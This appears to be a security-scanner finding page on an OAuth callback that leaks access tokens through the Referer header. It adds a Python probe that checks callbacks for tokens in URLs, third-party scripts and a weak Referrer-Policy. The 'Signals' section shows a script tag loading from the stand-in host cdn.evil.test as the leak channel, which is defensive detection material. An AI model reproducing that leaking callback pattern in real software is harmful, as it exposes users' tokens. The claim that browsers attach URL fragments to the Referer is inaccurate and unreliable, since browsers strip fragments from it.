OAuth Callback

OAuth Token via Referer

The callback page receives the access token in the URL fragment and then loads a third-party CDN script, leaking the token via the Referer header.

CWE-200, CWE-201
Callback probe

Expected Findings

  • Tokens travel in URL fragments that browsers attach to the Referer.
  • Third-party CDN script tag is loaded from the same callback page.
  • `Referrer-Policy` header is not set.

Signals

HTML
<script src="https://cdn.evil.test/widget.js"></script>  <!-- cross-origin load: the Referer of this request carries the callback URL with the token -->
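As an added example (not part of the original page or of any project it describes), the following Python checker turns the three Expected Findings above into an automated probe over a callback response. It takes the callback URL, the response headers and the HTML body, and reports a token-bearing URL (query or fragment), any script loaded from a host other than the callback's own, and a missing Referrer-Policy. It goes slightly beyond the page by also treating the policies that still send the full URL cross-origin (`unsafe-url`, `no-referrer-when-downgrade`) as weak. The parameter names in `TOKEN_PARAMS`, the sample responses and the token value are constructed for the demonstration.

```python
"""Probe for the OAuth-callback Referer-leak signals: token in URL,
third-party <script src>, weak or missing Referrer-Policy.
Sample data below is constructed for this example."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Assumption: parameter names under which tokens usually appear in the URL.
TOKEN_PARAMS = {"access_token", "id_token", "token"}

# Policies that never put the path/query in a cross-origin Referer.
SAFE_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


class _ScriptSrcParser(HTMLParser):
    """Collect every <script src=...> value in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def token_locations(callback_url):
    """Return the URL parts ('query', 'fragment') that carry a token name."""
    parts = urlsplit(callback_url)
    found = []
    for where, raw in (("query", parts.query), ("fragment", parts.fragment)):
        if set(parse_qs(raw, keep_blank_values=True)) & TOKEN_PARAMS:
            found.append(where)
    return found


def third_party_scripts(callback_url, html):
    """Return script src values whose host differs from the callback's host."""
    own_host = urlsplit(callback_url).netloc.lower()
    parser = _ScriptSrcParser()
    parser.feed(html)
    # Relative paths have no netloc and are same-origin; '//host/x.js' is cross-origin.
    return [s for s in parser.srcs
            if urlsplit(s).netloc.lower() not in ("", own_host)]


def referrer_policy_weak(headers):
    """True when Referrer-Policy is absent or would send the full URL cross-origin."""
    lowered = {k.lower(): v for k, v in headers.items()}
    value = lowered.get("referrer-policy", "")
    # The header may be a comma-separated list; the last token is the one that applies.
    tokens = [t.strip().lower() for t in value.split(",") if t.strip()]
    effective = tokens[-1] if tokens else ""
    return effective not in SAFE_POLICIES


def check_callback(url, headers, html):
    """Run all three signals and return human-readable findings."""
    findings = [f"token in URL {where}" for where in token_locations(url)]
    findings += [f"third-party script: {src}" for src in third_party_scripts(url, html)]
    if referrer_policy_weak(headers):
        shown = headers.get("Referrer-Policy", "<missing>")
        findings.append(f"Referrer-Policy missing or permissive: {shown}")
    return findings


# Constructed sample responses (not captured traffic).
VULNERABLE = dict(
    url="https://app.example.test/oauth/callback#access_token=CONSTRUCTED_TOKEN&token_type=bearer",
    headers={"Content-Type": "text/html"},
    html='<html><body><script src="https://cdn.evil.test/widget.js"></script></body></html>',
)
HARDENED = dict(
    url="https://app.example.test/oauth/callback#access_token=CONSTRUCTED_TOKEN",
    headers={"Content-Type": "text/html", "Referrer-Policy": "no-referrer"},
    html='<html><body><script src="/static/widget.js"></script></body></html>',
)

if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, check_callback(**sample))
```

The hardened sample still reports the token in the fragment: `Referrer-Policy: no-referrer` and removing the cross-origin script close the Referer path, but a token left in the address bar is still readable by every script the page runs, so the probe keeps that as a finding for the callback to clear (for example by rewriting the URL with `history.replaceState` before any other resource loads).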